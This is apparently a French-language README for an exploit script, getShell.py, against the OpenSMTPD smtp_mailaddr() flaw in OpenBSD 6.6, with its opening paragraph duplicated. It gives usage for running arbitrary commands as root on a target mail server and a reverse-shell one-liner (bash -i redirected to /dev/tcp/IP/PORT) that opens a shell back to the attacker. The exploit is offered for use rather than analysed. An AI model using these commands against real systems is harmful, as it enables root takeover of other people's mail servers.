
Cette vulnérabilité existe dans le serveur de messagerie d'OpenBSD, OpenSMTPD, dans sa fonction “smtp_mailaddr()”, et affecte OpenBSD version 6.6. Cela permet à un attaquant d'exécuter des commandes shell arbitraires comme “sleep 66” en tant que root user.
Cette vulnérabilité existe dans la fonction "smtp_mailaddr()" du serveur de messagerie OpenSMTPD d'OpenBSD, et affecte la version 6.6 d'OpenBSD. Cela permet à un attaquant d'exécuter des commandes shell arbitraires comme "sleep 66" en tant qu'utilisateur root
python3 getShell.py <targetIp> <targetPort> <command>
Si vous avez besoin d'un shell inversé, exécutez-le comme ceci
python3 getShell.py <TargetIp> <TargetPort> 'bash -c "exec bash -i &> /dev/tcp/IP/PORT <&1"'
Modifiez certaines choses dans cet exploit comme RCPT to et quelque chose (si nécessaire)
Voir cet article pour une explication plus claire
https://blog.firosolutions.com/exploits/opensmtpd-remote-vulnerability/